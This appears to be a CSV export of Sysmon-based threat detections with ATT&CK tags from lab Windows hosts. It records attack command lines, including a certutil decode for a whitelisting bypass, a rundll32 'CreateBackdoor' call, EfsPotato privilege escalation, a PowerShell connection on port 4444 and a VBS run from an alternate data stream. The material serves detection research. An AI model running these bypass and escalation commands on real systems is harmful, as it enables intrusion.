Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5447 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:19.888 + 747F3D96-7933-5D45-0000-0010227E0701 + 6000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7930-5D45-0000-001055DE0601 + 4740 + C:\Windows\System32\consent.exe + consent.exe 896 318 0000028064471300 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15678 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:33:29.409 + 365ABB72-7DA9-5CD5-0000-00100ED31400 + 2524 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /priv + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + "c:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1912935 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-08-22 19:33:38.890 + 00247C92-A692-6122-0000-0010A5CD1F02 + 11328 + C:\Windows\System32\whoami.exe + 10.0.19041.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\WINDOWS\system32\ + NT AUTHORITY\SYSTEM + 00247C92-7087-6122-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 00247C92-A691-6122-0000-001021C31F02 + 14048 + C:\temp\EfsPotato.exe + c:\temp\EfsPotato.exe whoami + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4888 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.614 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15677 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:32:54.034 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7D85-5CD5-0000-001047061400 + 2536 + C:\Windows\System32\CompMgmtLauncher.exe + "C:\Windows\System32\CompMgmtLauncher.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8119 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:52.956 + 365ABB72-3ED8-5D0B-0000-0010398F1A00 + 1476 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + "cmd" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4887 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:57.600 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6056-5D3F-0000-0010C9EF4100 + 4600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342417 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:08.141 + 747F3D96-E940-5F33-0000-001039310F00 + 7460 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 8118 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.721 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.13 + IEWIN7 + 4444 + + false + 10.0.2.18 + + 38208 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196375 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-24 01:13:54.117 + 747F3D96-CA52-5EC9-0000-001027FA3700 + 4456 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 07:26:35.116 + 747F3D96-88AB-5D46-0000-001081ED7D03 + 4300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-88AA-5D46-0000-001093E37D03 + 4644 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe") ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342416 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:04.074 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E93B-5F33-0000-001003BA0E00 + 7920 + C:\Windows\System32\wermgr.exe + C:\Windows\system32\wermgr.exe -upload + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11267 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 03:25:24.677 + 365ABB72-9DA4-5CD3-0000-00107F7A2F00 + 2920 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9DA4-5CD3-0000-00102E692F00 + 3184 + C:\Windows\System32\sdclt.exe + "C:\Windows\system32\sdclt.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11242 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:52:23.515 + 